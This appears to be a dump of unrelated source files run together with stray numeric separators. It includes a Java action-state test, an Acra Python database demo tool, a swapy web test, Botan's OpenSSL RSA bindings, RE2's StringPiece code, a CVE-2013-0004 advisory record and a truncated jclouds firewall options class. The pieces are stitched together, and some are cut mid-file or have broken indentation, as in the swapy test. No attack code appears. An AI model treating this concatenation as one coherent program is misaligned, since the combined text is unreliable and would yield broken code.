            if (b && lookup(Openable.class) == null) {
                ic.add(new Open());
            } else if (!b) {
                Openable o = lookup(Openable.class);
                if (o != null) {
                    ic.remove(o);
                }
            }
        }
        public Lookup getLookup() {
            return this;
        }
    }
    /** Simple bean with a bound boolean property; model driving CheckAction's state. */
    private static class TestData {
        private boolean stateValue;
        public static final String PROP_STATEVALUE = "stateValue";
        public boolean isStateValue() {
            return stateValue;
        }
        public void setStateValue(boolean stateValue) {
            boolean oldStateValue = this.stateValue;
            this.stateValue = stateValue;
            propertyChangeSupport.firePropertyChange(PROP_STATEVALUE, oldStateValue, stateValue);
        }
        private final transient PropertyChangeSupport propertyChangeSupport = new PropertyChangeSupport(this);
        public void addPropertyChangeListener(PropertyChangeListener listener) {
            propertyChangeSupport.addPropertyChangeListener(listener);
        }
        public void removePropertyChangeListener(PropertyChangeListener listener) {
            propertyChangeSupport.removePropertyChangeListener(listener);
        }
    }
    /**
     * Test action, whose state is driven by a model: the {@code checkedOn}
     * registration attribute binds the checked state to
     * {@code TestData.stateValue}.
     */
    @ActionID(category = "Test", id = "CheckedTest")
    @ActionRegistration(displayName = "Test Action",
            checkedOn = @ActionState(
                    type = TestData.class,
                    property = "stateValue"
            )
    )
    public static class CheckAction extends AbstractAction {
        private final TestData data;
        public CheckAction(TestData data) {
            this.data = data;
        }
        @Override
        public void actionPerformed(ActionEvent e) {
            // intentionally empty - only the enabled/checked state is tested
        }
    }
/**
* Checks that a stateful action properly changes its state, based
* on the supplied data.
* @throws Exception
*/
public void testActionGlobalState() throws Exception {
Action baseA = Actions.forID("Test", "CheckedTest");
// baseAction is not enabled - no data:
assertFalse("No data, action must be disabled", getIsEnabled(baseA));
// baseAction is also not checked:
assertFalse("No data, action cannot be checked", getIsChecked(baseA));
// now provide the action:
TestData data = new TestData();
activate(Lookups.fixed(data));
assertTrue("Data was published, action must enable", getIsEnabled(baseA));
assertFalse("Data is false, action must be unchedked", getIsChecked(baseA));
data.setStateValue(true);
assertTrue(getIsEnabled(baseA));
assertTrue("Data changed to true, action must be checked", getIsChecked(baseA));
}
    /**
     * Data published before the action is first queried, starting unchecked;
     * the action must enable immediately and track the model's transition
     * to {@code true}.
     */
    public void testActionGlobalStateStartUnchecked() throws Exception {
        TestData data = new TestData();
        activate(Lookups.fixed(data));
        Action baseA = Actions.forID("Test", "CheckedTest");
        // baseAction is not enabled - no data:
        assertTrue("Action must start up enabled", getIsEnabled(baseA));
        assertFalse("Data is false, action must be unchecked", getIsChecked(baseA));
        data.setStateValue(true);
        assertTrue("Data changed to true, action checked", getIsChecked(baseA));
    }
    /**
     * Data published with the property already {@code true}; the action must
     * start checked and uncheck when the model flips back to {@code false}.
     */
    public void testActionGlobalStateStartChecked() throws Exception {
        TestData data = new TestData();
        data.setStateValue(true);
        activate(Lookups.fixed(data));
        Action baseA = Actions.forID("Test", "CheckedTest");
        // baseAction is not enabled - no data:
        assertTrue(getIsEnabled(baseA));
        // baseAction is also not checked:
        assertTrue(getIsChecked(baseA));
        data.setStateValue(false);
        assertFalse("Data is false, action must be unchecked", getIsChecked(baseA));
    }
    /**
     * Checks that context-aware clones of a stateful action track their own
     * local context independently: a model change in one context fires a
     * SELECTED_KEY property change only on the delegate bound to it.
     */
    public void testContextDelegate() throws Exception {
        TestData data = new TestData();
        data.setStateValue(true);
        TestData otherData = new TestData();
        Action baseA = Actions.forID("Test", "CheckedTest");
        // must change main action Lookup after the main delegate exists,
        // so it gets property change and changes its Action.SELECTED_KEY
        // otherwise the .map is null and action just delegates to Fallback
        activate(Lookups.fixed(data));
        assertSame(data, Utilities.actionsGlobalContext().lookup(TestData.class));
        InstanceContent ic = new InstanceContent();
        Lookup context = new AbstractLookup(ic);
        ic.add(data);
        assertTrue(getIsEnabled(baseA));
        assertTrue(getIsChecked(baseA));
        Action actionA = ((ContextAwareAction)baseA).createContextAwareInstance(context);
        assertTrue(getIsEnabled(actionA));
        assertTrue(getIsChecked(actionA));
        // let's have completely different local context:
        Lookup context2 = Lookups.fixed(otherData);
        Action actionB = ((ContextAwareAction)baseA).createContextAwareInstance(context2);
        assertTrue(getIsEnabled(actionB));
        // in this context, action should be enabled, but UNchecked.
        assertFalse(getIsChecked(actionB));
        // records the names of properties fired on each action instance
        class PCL implements PropertyChangeListener {
            Set<String> propChanges = Collections.synchronizedSet(new HashSet<>());
            @Override
            public void propertyChange(PropertyChangeEvent evt) {
                String n = evt.getPropertyName();
                if (n != null) {
                    propChanges.add(n);
                }
            }
        }
        PCL listenerBase = new PCL();
        PCL listenerA = new PCL();
        PCL listenerB = new PCL();
        baseA.addPropertyChangeListener(listenerBase);
        actionA.addPropertyChangeListener(listenerA);
        actionB.addPropertyChangeListener(listenerB);
        TestData data3 = new TestData();
        // the data has property false, so actionA should fire & change, not the other ones
        ic.set(Collections.singleton(data3), null);
        // also potentially replans to AWT, so the pending change event from lookup
        // will be probably processed.
        assertFalse(getIsChecked(actionA));
        assertTrue(getIsChecked(baseA));
        assertTrue(listenerBase.propChanges.isEmpty());
        assertTrue(listenerB.propChanges.isEmpty());
        assertTrue(listenerA.propChanges.contains(Action.SELECTED_KEY));
        listenerA.propChanges.clear();
        otherData.setStateValue(true);
        // again sync with AWT
        assertTrue(getIsChecked(baseA));
        assertTrue(getIsChecked(actionB));
        assertTrue(listenerBase.propChanges.isEmpty());
        assertTrue(listenerA.propChanges.isEmpty());
        assertTrue(listenerB.propChanges.contains(Action.SELECTED_KEY));
    }
}
| 14,255 |
1,000 | # Copyright 2016, Cossack Labs Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import argparse
import json
from sqlalchemy.dialects import postgresql
from sqlalchemy import (Table, Column, Integer, MetaData, select, LargeBinary, Text, BigInteger)
from common import get_engine, get_default, register_common_cli_params
# Shared metadata for all tables created/used by this tool.
metadata = MetaData()
# Main demo table: plain binary columns plus tokenized columns of
# various types (int32/int64/str/bytes/email).
test_table = Table(
    'test', metadata,
    Column('id', Integer, primary_key=True, nullable=False),
    Column('data', LargeBinary, nullable=True),
    Column('masking', LargeBinary, nullable=True),
    Column('token_i32', Integer, nullable=True),
    Column('token_i64', BigInteger, nullable=True),
    Column('token_str', Text, nullable=True),
    Column('token_bytes', LargeBinary, nullable=True),
    Column('token_email', Text, nullable=True),
)
# Table used by the key-rotation test scenario.
rotation_test_table = Table(
    'users', metadata,
    Column('id', Integer, primary_key=True, nullable=False),
    Column('email', LargeBinary, nullable=True),
)
# CLI-selectable tables, keyed by their SQL name (see --db_table).
table_map = {
    test_table.name: test_table,
    rotation_test_table.name: rotation_test_table,
}
def print_data(connection, columns, table=test_table):
    """Fetch rows from ``table`` and print them to the console.

    :param connection: active SQLAlchemy connection
    :param columns: optional list of column names to display besides ``id``;
        a falsy value selects all non-``id`` columns
    :param table: SQLAlchemy ``Table`` to query (defaults to ``test_table``)
    :raises AttributeError: if ``columns`` contains an unknown column name
    """
    default_columns = ['id']
    try:
        if columns:
            table_columns = [table.c.id] + [
                getattr(table.c, i) for i in columns]
            extra_columns = columns
        else:
            table_columns = [table.c.id] + [
                i for i in table.columns if i.name not in default_columns]
            extra_columns = [i.name for i in table.columns if i.name not in default_columns]
        query = select(table_columns)
    except AttributeError:
        # unknown column name was passed via `columns`; re-raise after the hint
        # (the original also had an unreachable exit(1) after this raise)
        print("\n\n{0}\nprobably you used incorrect column name\n{0}\n\n".format('*'*30))
        raise
    # bug fix: the format placeholder was never applied - the query used to be
    # passed as a second positional argument to print()
    print("Fetch data by query {}\n".format(
        query.compile(dialect=postgresql.dialect(), compile_kwargs={"literal_binds": True})))
    result = connection.execute(query)
    result = result.fetchall()
    print(len(result))
    print("{:<3} - {}".format(*default_columns, ' - '.join(extra_columns)))
    for row in result:
        values = ['{:<3}'.format(row['id'])]
        for col in row[1:]:
            # binary columns may contain non-UTF8 bytes; ignore decode errors
            if isinstance(col, (bytes, bytearray)):
                values.append(col.decode('utf-8', errors='ignore'))
            else:
                values.append(str(col))
        print(' - '.join(values))
def write_data(data, connection, table=test_table):
    """Load rows from the JSON file at path ``data`` and insert into ``table``.

    String values of binary-ish columns are ASCII-encoded to bytes before
    insertion; the actual encryption/wrapping into AcraStructs is done
    transparently by the Acra server, not here.
    """
    # renamed the loaded value to avoid shadowing the `data` path parameter
    with open(data, 'r') as f:
        loaded = json.load(f)
    print("data: {}".format(loaded))
    rows = loaded
    if isinstance(loaded, dict):
        # a single JSON object means a single row
        rows = [loaded]
    for row in rows:
        for k in ('data', 'email', 'token_bytes', 'masking'):
            if k in row:
                row[k] = row[k].encode('ascii')
        connection.execute(
            table.insert(), row)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    register_common_cli_params(parser)
    parser.add_argument('--data', type=str,
                        default=get_default('data', ''),
                        help='data to save in ascii. default random data')
    parser.add_argument('-c', '--columns', nargs='+', dest='columns',
                        default=get_default('columns', False), help='List of columns to display')
    parser.add_argument('--db_table', default=test_table.name, help='Table used to read/write data')
    args = parser.parse_args()
    engine = get_engine(
        # fixed anonymization residue (`<PASSWORD>.<PASSWORD>`): pass the
        # CLI-provided password through; presumably registered by
        # register_common_cli_params - TODO confirm the argument name
        db_host=args.host, db_port=args.port, db_user=args.db_user, db_password=args.db_password,
        db_name=args.db_name, is_mysql=args.mysql, is_postgresql=args.postgresql,
        tls_ca=args.tls_root_cert, tls_key=args.tls_key, tls_crt=args.tls_cert,
        sslmode=args.ssl_mode, verbose=args.verbose)
    connection = engine.connect()
    metadata.create_all(engine)
    if args.print:
        print_data(connection, args.columns, table_map[args.db_table])
    elif args.data:
        write_data(args.data, connection, table_map[args.db_table])
    else:
        print('Use --print or --data options')
        exit(1)
| 1,926 |
834 | <gh_stars>100-1000
import sys
import os
# Only for testing
if os.path.exists('../swapy/__init__.py'):
sys.path.append(os.path.abspath('../'))
else:
sys.path.append(os.path.abspath('./'))
import swapy
from swapy.ext import api_docs
from swapy.testing import client
from swapy.middlewares import JsonMiddleware
api_docs.init()
@swapy.on('test')
def test():
    # NOTE: the docstring text is asserted verbatim by test_works() via the
    # generated /docs page, so it must stay exactly "HI :)"
    """HI :)"""
    return 'Hi!'
@swapy.on_get('another/<int:id>')
def another(req):
    """Just another test"""
    # req.url_args presumably holds the parsed <int:id> path parameter - confirm
    print(req.headers)
    return str(req.url_args)
@swapy.on('json')
@JsonMiddleware
def json(req):
    # echoes the parsed request body; JsonMiddleware handles serialization
    return req.json
# Test client wrapping the swapy WSGI app (used by the assertion below).
c = client(swapy.app())
if __name__ == '__main__':
    # run a live development server only when executed directly
    swapy.run(debug=True)
def test_works():
    # the generated /docs page must contain the docstring of test()
    r = c.get('docs')
    assert 'HI :)' in r.data.decode()
1,988 | <filename>src/lib/prov/openssl/openssl_rsa.cpp
/*
* RSA operations provided by OpenSSL
* (C) 2015 <NAME>
* (C) 2017 <NAME>
*
* Botan is released under the Simplified BSD License (see license.txt)
*/
#include <botan/internal/openssl.h>
#if defined(BOTAN_HAS_RSA)
#include <botan/rsa.h>
#include <botan/rng.h>
#include <botan/internal/pk_ops_impl.h>
#include <botan/internal/ct_utils.h>
#include <functional>
#include <memory>
#include <cstdlib>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/err.h>
#include <openssl/rand.h>
#include <limits.h>
namespace Botan {
namespace {
std::pair<int, size_t> get_openssl_enc_pad(const std::string& eme)
{
if(eme == "Raw")
return std::make_pair(RSA_NO_PADDING, 0);
else if(eme == "EME-PKCS1-v1_5")
return std::make_pair(RSA_PKCS1_PADDING, 11);
else if(eme == "OAEP(SHA-1)" || eme == "EME1(SHA-1)")
return std::make_pair(RSA_PKCS1_OAEP_PADDING, 41);
else
throw Lookup_Error("OpenSSL RSA does not support EME " + eme);
}
/*
* RSA encryption via OpenSSL. The Botan public key is round-tripped
* through its DER encoding into an OpenSSL RSA handle; padding mode and
* its byte overhead come from get_openssl_enc_pad().
*/
class OpenSSL_RSA_Encryption_Operation final : public PK_Ops::Encryption
   {
   public:
      OpenSSL_RSA_Encryption_Operation(const RSA_PublicKey& rsa, int pad, size_t pad_overhead) :
         m_openssl_rsa(nullptr, ::RSA_free), m_padding(pad)
         {
         const std::vector<uint8_t> der = rsa.public_key_bits();
         const uint8_t* der_ptr = der.data();
         m_openssl_rsa.reset(::d2i_RSAPublicKey(nullptr, &der_ptr, der.size()));
         if(!m_openssl_rsa)
            throw OpenSSL_Error("d2i_RSAPublicKey", ERR_get_error());
         // maximum plaintext size in bits, after subtracting padding overhead
         m_bits = 8 * (n_size() - pad_overhead) - 1;
         }
      size_t ciphertext_length(size_t) const override { return ::RSA_size(m_openssl_rsa.get()); }
      size_t max_input_bits() const override { return m_bits; }
      secure_vector<uint8_t> encrypt(const uint8_t msg[], size_t msg_len,
                                     RandomNumberGenerator&) override
         {
         const size_t mod_sz = n_size();
         if(msg_len > mod_sz)
            throw Invalid_Argument("Input too large for RSA key");
         secure_vector<uint8_t> outbuf(mod_sz);
         secure_vector<uint8_t> inbuf;
         if(m_padding == RSA_NO_PADDING)
            {
            // raw RSA requires an input of exactly the modulus size;
            // left-pad the message with zero bytes
            inbuf.resize(mod_sz);
            copy_mem(&inbuf[mod_sz - msg_len], msg, msg_len);
            }
         else
            {
            inbuf.assign(msg, msg + msg_len);
            }
         int rc = ::RSA_public_encrypt(static_cast<int>(inbuf.size()), inbuf.data(),
                                       outbuf.data(),
                                       m_openssl_rsa.get(), m_padding);
         if(rc < 0)
            throw OpenSSL_Error("RSA_public_encrypt", ERR_get_error());
         return outbuf;
         }
   private:
      // size of the modulus n in bytes
      size_t n_size() const { return ::RSA_size(m_openssl_rsa.get()); }
      std::unique_ptr<RSA, std::function<void (RSA*)>> m_openssl_rsa;
      size_t m_bits = 0;
      int m_padding = 0;
   };
/*
* RSA decryption via OpenSSL. Padding failures are reported through the
* valid_mask out-parameter rather than an exception, to avoid acting as
* a padding oracle.
*/
class OpenSSL_RSA_Decryption_Operation final : public PK_Ops::Decryption
   {
   public:
      OpenSSL_RSA_Decryption_Operation(const RSA_PrivateKey& rsa, int pad) :
         m_openssl_rsa(nullptr, ::RSA_free), m_padding(pad)
         {
         const secure_vector<uint8_t> der = rsa.private_key_bits();
         const uint8_t* der_ptr = der.data();
         m_openssl_rsa.reset(d2i_RSAPrivateKey(nullptr, &der_ptr, der.size()));
         if(!m_openssl_rsa)
            throw OpenSSL_Error("d2i_RSAPrivateKey", ERR_get_error());
         }
      size_t plaintext_length(size_t) const override { return ::RSA_size(m_openssl_rsa.get()); }
      secure_vector<uint8_t> decrypt(uint8_t& valid_mask,
                                     const uint8_t msg[], size_t msg_len) override
         {
         secure_vector<uint8_t> buf(::RSA_size(m_openssl_rsa.get()));
         int rc = ::RSA_private_decrypt(static_cast<int>(msg_len), msg,
                                        buf.data(), m_openssl_rsa.get(), m_padding);
         if(rc < 0 || static_cast<size_t>(rc) > buf.size())
            {
            // decryption/padding failure: signal via mask, return empty
            valid_mask = 0;
            buf.resize(0);
            }
         else
            {
            valid_mask = 0xFF;
            buf.resize(rc);
            }
         if(m_padding == RSA_NO_PADDING)
            {
            // raw RSA output is left-zero-padded to the modulus size
            return CT::strip_leading_zeros(buf);
            }
         return buf;
         }
   private:
      std::unique_ptr<RSA, std::function<void (RSA*)>> m_openssl_rsa;
      int m_padding = 0;
   };
/*
* RSA signature verification with message recovery: applies the raw RSA
* public operation and lets the EMSA layer check the recovered encoding.
*/
class OpenSSL_RSA_Verification_Operation final : public PK_Ops::Verification_with_EMSA
   {
   public:
      OpenSSL_RSA_Verification_Operation(const RSA_PublicKey& rsa, const std::string& emsa) :
         PK_Ops::Verification_with_EMSA(emsa, true),
         m_openssl_rsa(nullptr, ::RSA_free)
         {
         const std::vector<uint8_t> der = rsa.public_key_bits();
         const uint8_t* der_ptr = der.data();
         m_openssl_rsa.reset(::d2i_RSAPublicKey(nullptr, &der_ptr, der.size()));
         if(!m_openssl_rsa)
            throw OpenSSL_Error("d2i_RSAPublicKey", ERR_get_error());
         }
      size_t max_input_bits() const override
         {
         // RSA_bits() only exists in OpenSSL >= 1.1; fall back to the
         // struct member on older versions
#if OPENSSL_VERSION_NUMBER < 0x10100000L
         return ::BN_num_bits(m_openssl_rsa->n) - 1;
#else
         return ::RSA_bits(m_openssl_rsa.get()) - 1;
#endif
         }
      bool with_recovery() const override { return true; }
      secure_vector<uint8_t> verify_mr(const uint8_t msg[], size_t msg_len) override
         {
         const size_t mod_sz = ::RSA_size(m_openssl_rsa.get());
         if(msg_len > mod_sz)
            throw Invalid_Argument("OpenSSL RSA verify input too large");
         // left-pad the signature to the modulus size for the raw operation
         secure_vector<uint8_t> inbuf(mod_sz);
         if(msg_len > 0)
            copy_mem(&inbuf[mod_sz - msg_len], msg, msg_len);
         secure_vector<uint8_t> outbuf(mod_sz);
         int rc = ::RSA_public_decrypt(static_cast<int>(inbuf.size()), inbuf.data(),
                                       outbuf.data(),
                                       m_openssl_rsa.get(), RSA_NO_PADDING);
         if(rc < 0)
            throw Invalid_Argument("RSA_public_decrypt");
         return CT::strip_leading_zeros(outbuf);
         }
   private:
      std::unique_ptr<RSA, std::function<void (RSA*)>> m_openssl_rsa;
   };
/*
* RSA signing: the EMSA layer produces the padded encoding, and this class
* applies the raw RSA private operation to it.
*/
class OpenSSL_RSA_Signing_Operation final : public PK_Ops::Signature_with_EMSA
   {
   public:
      OpenSSL_RSA_Signing_Operation(const RSA_PrivateKey& rsa, const std::string& emsa) :
         PK_Ops::Signature_with_EMSA(emsa, true),
         m_openssl_rsa(nullptr, ::RSA_free)
         {
         const secure_vector<uint8_t> der = rsa.private_key_bits();
         const uint8_t* der_ptr = der.data();
         m_openssl_rsa.reset(d2i_RSAPrivateKey(nullptr, &der_ptr, der.size()));
         if(!m_openssl_rsa)
            throw OpenSSL_Error("d2i_RSAPrivateKey", ERR_get_error());
         }
      size_t signature_length() const override { return ::RSA_size(m_openssl_rsa.get()); }
      secure_vector<uint8_t> raw_sign(const uint8_t msg[], size_t msg_len,
                                      RandomNumberGenerator&) override
         {
         const size_t mod_sz = ::RSA_size(m_openssl_rsa.get());
         if(msg_len > mod_sz)
            throw Invalid_Argument("OpenSSL RSA sign input too large");
         // left-pad the EMSA-encoded message to the modulus size
         secure_vector<uint8_t> inbuf(mod_sz);
         copy_mem(&inbuf[mod_sz - msg_len], msg, msg_len);
         secure_vector<uint8_t> outbuf(mod_sz);
         int rc = ::RSA_private_encrypt(static_cast<int>(inbuf.size()), inbuf.data(),
                                        outbuf.data(),
                                        m_openssl_rsa.get(), RSA_NO_PADDING);
         if(rc < 0)
            throw OpenSSL_Error("RSA_private_encrypt", ERR_get_error());
         return outbuf;
         }
      size_t max_input_bits() const override
         {
         // RSA_bits() only exists in OpenSSL >= 1.1
#if OPENSSL_VERSION_NUMBER < 0x10100000L
         return ::BN_num_bits(m_openssl_rsa->n) - 1;
#else
         return ::RSA_bits(m_openssl_rsa.get()) - 1;
#endif
         }
   private:
      std::unique_ptr<RSA, std::function<void (RSA*)>> m_openssl_rsa;
   };
}
std::unique_ptr<PK_Ops::Encryption>
make_openssl_rsa_enc_op(const RSA_PublicKey& key, const std::string& params)
{
auto pad_info = get_openssl_enc_pad(params);
return std::unique_ptr<PK_Ops::Encryption>(
new OpenSSL_RSA_Encryption_Operation(key, pad_info.first, pad_info.second));
}
/*
* Creates an RSA decryption operation; only the padding constant matters,
* the overhead value from get_openssl_enc_pad is unused here.
*/
std::unique_ptr<PK_Ops::Decryption>
make_openssl_rsa_dec_op(const RSA_PrivateKey& key, const std::string& params)
   {
   auto pad_info = get_openssl_enc_pad(params);
   return std::make_unique<OpenSSL_RSA_Decryption_Operation>(key, pad_info.first);
   }
/* Creates an RSA verification operation for the given EMSA name. */
std::unique_ptr<PK_Ops::Verification>
make_openssl_rsa_ver_op(const RSA_PublicKey& key, const std::string& params)
   {
   return std::make_unique<OpenSSL_RSA_Verification_Operation>(key, params);
   }
/* Creates an RSA signing operation for the given EMSA name. */
std::unique_ptr<PK_Ops::Signature>
make_openssl_rsa_sig_op(const RSA_PrivateKey& key, const std::string& params)
   {
   return std::make_unique<OpenSSL_RSA_Signing_Operation>(key, params);
   }
/*
* Generates an RSA private key with OpenSSL, seeding OpenSSL's RNG from
* the given Botan RNG, then re-imports the DER encoding as a Botan key.
*/
std::unique_ptr<RSA_PrivateKey>
make_openssl_rsa_private_key(RandomNumberGenerator& rng, size_t rsa_bits)
   {
   if (rsa_bits > INT_MAX)
      throw Internal_Error("rsa_bits overflow");
   // mix 128 bytes of Botan RNG output into OpenSSL's RNG state
   secure_vector<uint8_t> seed(128);
   rng.randomize(seed.data(), seed.size());
   RAND_seed(seed.data(), static_cast<int>(seed.size()));
   // public exponent e = 65537 (RSA_F4)
   std::unique_ptr<BIGNUM, std::function<void (BIGNUM*)>> bn(BN_new(), BN_free);
   if(!bn)
      throw OpenSSL_Error("BN_new", ERR_get_error());
   if(!BN_set_word(bn.get(), RSA_F4))
      throw OpenSSL_Error("BN_set_word", ERR_get_error());
   std::unique_ptr<RSA, std::function<void (RSA*)>> rsa(RSA_new(), RSA_free);
   if(!rsa)
      throw OpenSSL_Error("RSA_new", ERR_get_error());
   if(!RSA_generate_key_ex(rsa.get(), static_cast<int>(rsa_bits), bn.get(), nullptr))
      throw OpenSSL_Error("RSA_generate_key_ex", ERR_get_error());
   // i2d_RSAPrivateKey allocates the DER buffer itself when *der is null
   uint8_t* der = nullptr;
   int bytes = i2d_RSAPrivateKey(rsa.get(), &der);
   if(bytes < 0)
      throw OpenSSL_Error("i2d_RSAPrivateKey", ERR_get_error());
   const secure_vector<uint8_t> keydata(der, der + bytes);
   // scrub the key material before releasing the buffer
   // NOTE(review): the buffer was allocated by OpenSSL; OPENSSL_free would be
   // the matching deallocator - confirm std::free is safe on all target platforms
   secure_scrub_memory(der, bytes);
   std::free(der);
   return std::unique_ptr<Botan::RSA_PrivateKey>
      (new RSA_PrivateKey(AlgorithmIdentifier(), keydata));
   }
}
#endif // BOTAN_HAS_RSA
| 5,120 |
772 | <filename>dashboard/config/programming_expressions/spritelab/codestudio_ifStatement.json
{
"category": "Logic",
"config": {
"docFunc": "codestudio_ifStatement",
"func": "controls_if_if"
}
} | 83 |
2,816 | // Copyright 2004 The RE2 Authors. All Rights Reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
#include "re2/stringpiece.h"
#include <ostream>
#include "util/util.h"
namespace duckdb_re2 {
const StringPiece::size_type StringPiece::npos; // initialized in stringpiece.h
// Copies at most n bytes starting at pos into buf; returns the count copied.
// NOTE(review): unlike substr(), pos is not clamped - assumes pos <= size_.
StringPiece::size_type StringPiece::copy(char* buf, size_type n,
                                         size_type pos) const {
  size_type ret = std::min(size_ - pos, n);
  memcpy(buf, data_ + pos, ret);
  return ret;
}
// Returns the sub-piece [pos, pos+n), clamping both the starting offset and
// the length so the result never reaches past the end of this piece.
StringPiece StringPiece::substr(size_type pos, size_type n) const {
  const size_type start = std::min(pos, size_);
  const size_type len = std::min(n, size_ - start);
  return StringPiece(data_ + start, len);
}
// Finds the first occurrence of s at or after pos; npos if absent.
StringPiece::size_type StringPiece::find(const StringPiece& s,
                                         size_type pos) const {
  if (pos > size_) return npos;
  // std::search returns the end iterator (data_ + size_) when not found
  const_pointer result = std::search(data_ + pos, data_ + size_,
                                     s.data_, s.data_ + s.size_);
  size_type xpos = result - data_;
  // also rejects positions where a full match would not fit
  return xpos + s.size_ <= size_ ? xpos : npos;
}
// Finds the first occurrence of c at or after pos; npos if absent.
StringPiece::size_type StringPiece::find(char c, size_type pos) const {
  // NOTE(review): size_type appears unsigned, so `size_ <= 0` is just an
  // emptiness check - confirm
  if (size_ <= 0 || pos >= size_) return npos;
  const_pointer result = std::find(data_ + pos, data_ + size_, c);
  return result != data_ + size_ ? result - data_ : npos;
}
// Finds the last occurrence of s starting at or before pos; npos if absent.
StringPiece::size_type StringPiece::rfind(const StringPiece& s,
                                          size_type pos) const {
  if (size_ < s.size_) return npos;
  // an empty needle matches at min(pos, size_)
  if (s.size_ == 0) return std::min(size_, pos);
  // limit the search so a match cannot start after position pos
  const_pointer last = data_ + std::min(size_ - s.size_, pos) + s.size_;
  const_pointer result = std::find_end(data_, last, s.data_, s.data_ + s.size_);
  return result != last ? result - data_ : npos;
}
// Finds the last occurrence of c at or before pos; npos if absent.
StringPiece::size_type StringPiece::rfind(char c, size_type pos) const {
  if (size_ <= 0) return npos;
  // scan backwards from min(pos, size_ - 1)
  for (size_t i = std::min(pos + 1, size_); i != 0;) {
    if (data_[--i] == c) return i;
  }
  return npos;
}
// Stream insertion: writes the raw bytes (the piece need not be NUL-terminated).
std::ostream& operator<<(std::ostream& o, const StringPiece& p) {
  o.write(p.data(), p.size());
  return o;
}
| 913 |
892 | <gh_stars>100-1000
{
"schema_version": "1.2.0",
"id": "GHSA-cq62-c6vp-pfrh",
"modified": "2022-05-05T02:48:14Z",
"published": "2022-05-05T02:48:14Z",
"aliases": [
"CVE-2013-0004"
],
"details": "Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly validate the permissions of objects in memory, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka \"Double Construction Vulnerability.\"",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-0004"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-004"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A16339"
},
{
"type": "WEB",
"url": "http://www.us-cert.gov/cas/techalerts/TA13-008A.html"
}
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"severity": "HIGH",
"github_reviewed": false
}
} | 552 |
324 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jclouds.googlecomputeengine.options;
import java.net.URI;
import java.util.List;
import org.jclouds.googlecomputeengine.domain.Firewall;
import com.google.common.collect.ImmutableList;
/**
 * Options to insert a firewall.
 *
 * <p>Mutable builder-style options: all setters return {@code this} so calls
 * can be chained. The collection-valued fields accumulate entries via the
 * {@code add*} methods; the corresponding bulk setters replace all previously
 * accumulated entries.
 *
 * @see Firewall
 */
public class FirewallOptions {
   private String name;
   private URI network;
   private String description;
   private ImmutableList.Builder<String> sourceRanges = ImmutableList.builder();
   private ImmutableList.Builder<String> sourceTags = ImmutableList.builder();
   private ImmutableList.Builder<String> targetTags = ImmutableList.builder();
   private ImmutableList.Builder<Firewall.Rule> allowed = ImmutableList.builder();
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#allowed()
    */
   public List<Firewall.Rule> getAllowed() {
      return allowed.build();
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#allowed()
    */
   public FirewallOptions addAllowedRule(Firewall.Rule allowedRule) {
      this.allowed.add(allowedRule);
      return this;
   }
   /**
    * Replaces all previously added allowed rules.
    *
    * @see org.jclouds.googlecomputeengine.domain.Firewall#allowed()
    */
   public FirewallOptions allowedRules(List<Firewall.Rule> allowedRules) {
      this.allowed = ImmutableList.builder();
      this.allowed.addAll(allowedRules);
      return this;
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#name()
    */
   public FirewallOptions name(String name) {
      this.name = name;
      return this;
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#name()
    */
   public String name() {
      return name;
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#description()
    */
   public FirewallOptions description(String description) {
      this.description = description;
      return this;
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#description()
    */
   public String description() {
      return description;
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#network()
    */
   public FirewallOptions network(URI network) {
      this.network = network;
      return this;
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#network()
    */
   public URI network() {
      return network;
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#sourceRanges()
    */
   public List<String> sourceRanges() {
      return sourceRanges.build();
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#sourceRanges()
    */
   public FirewallOptions addSourceRange(String sourceRange) {
      this.sourceRanges.add(sourceRange);
      return this;
   }
   /**
    * Replaces all previously added source ranges.
    *
    * @see org.jclouds.googlecomputeengine.domain.Firewall#sourceRanges()
    */
   public FirewallOptions sourceRanges(Iterable<String> sourceRanges) {
      this.sourceRanges = ImmutableList.builder();
      this.sourceRanges.addAll(sourceRanges);
      return this;
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#sourceTags()
    */
   public List<String> sourceTags() {
      return sourceTags.build();
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#sourceTags()
    */
